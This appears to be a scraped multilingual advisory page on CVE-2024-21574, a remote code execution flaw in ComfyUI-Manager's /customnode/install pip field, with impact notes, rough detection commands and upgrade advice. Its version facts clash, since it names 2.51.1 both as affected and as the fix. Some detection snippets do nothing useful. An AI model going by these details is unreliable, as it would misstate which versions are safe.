平台
python
组件
comfyui-manager
修复版本
2.51.1
CVE-2024-21574 describes a remote code execution (RCE) vulnerability in ComfyUI-Manager, a Python-based application. This vulnerability arises from insufficient validation of the 'pip' field within a POST request to the /customnode/install endpoint, which is used for installing custom nodes. Successful exploitation allows an attacker to trigger a pip install on a user-controlled package or URL, leading to arbitrary code execution on the server. Affected versions include 0.0.0 up to and including 2.51.1; upgrading to version 2.51.1 resolves the issue.
The impact of CVE-2024-21574 is severe. An attacker who successfully exploits this vulnerability can achieve complete control over the ComfyUI-Manager server. This includes the ability to execute arbitrary commands, install malware, steal sensitive data, and potentially pivot to other systems on the network. The vulnerability's reliance on the pip package installer makes it particularly dangerous, as attackers can leverage malicious packages from compromised repositories or even host their own. Given ComfyUI-Manager's use in AI workflows, this could lead to data poisoning or the execution of unauthorized AI models, further expanding the potential damage. The lack of input validation directly enables this RCE, making it a high-priority concern.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The vulnerability's simplicity and the widespread use of pip make it a likely candidate for exploitation. While no public proof-of-concept (PoC) has been widely reported, the ease of crafting a malicious pip command suggests that one could emerge quickly. The EPSS score is likely to be assessed as medium to high, given the RCE nature and the relative ease of exploitation. It is not currently listed on the CISA KEV catalog.
Organizations and individuals utilizing ComfyUI-Manager for AI workflows, particularly those with exposed instances or those allowing custom node installations from untrusted sources, are at significant risk. Shared hosting environments where multiple users share the same ComfyUI-Manager instance are especially vulnerable, as an attacker could potentially compromise the entire environment through a single user's custom node installation.
• linux / server:
journalctl -u comfyui-manager -g 'pip install' | grep -i error• python / supply-chain:
import subprocess
result = subprocess.run(['pip', 'install', '--version'], capture_output=True, text=True)
print(result.stdout)• generic web:
curl -I http://<comfyui_manager_ip>/customnode/install | grep 'pip'disclosure
漏洞利用状态
EPSS
7.10% (91% 百分位)
CISA SSVC
CVSS 向量
The primary mitigation for CVE-2024-21574 is to immediately upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately feasible due to compatibility concerns or breaking changes, consider implementing temporary workarounds. Restrict network access to the /customnode/install endpoint to trusted sources only. Implement a Web Application Firewall (WAF) with rules to block requests containing suspicious or malicious pip commands. Carefully review and validate any custom node installations before applying them. Monitor system logs for unusual pip activity or unexpected process executions. While a direct detection signature is difficult without deeper analysis of the pip install process, monitor for the execution of unusual Python scripts or the installation of unexpected packages.
Actualice ComfyUI-Manager a la versión 2.51.1 o superior. Esta versión corrige la vulnerabilidad de ejecución remota de código al validar correctamente el campo 'pip' en la solicitud POST al endpoint /customnode/install. Para actualizar, utilice el administrador de paquetes de Python (pip) o siga las instrucciones proporcionadas por el desarrollador del plugin.
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions 0.0.0 through 2.51.1. It allows attackers to execute arbitrary code by exploiting a missing input validation in the /customnode/install endpoint.
You are affected if you are running ComfyUI-Manager versions 0.0.0 to 2.51.1. Immediately upgrade to version 2.51.1 or later to mitigate the risk.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, restrict access to the /customnode/install endpoint and implement WAF rules.
While no widespread exploitation has been confirmed, the vulnerability's ease of exploitation suggests it is a likely target. Monitor your systems closely for suspicious activity.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.
上传你的依赖文件,立即了解此CVE和其他CVE是否影响你。
上传你的 requirements.txt 文件,立即知道是否受影响。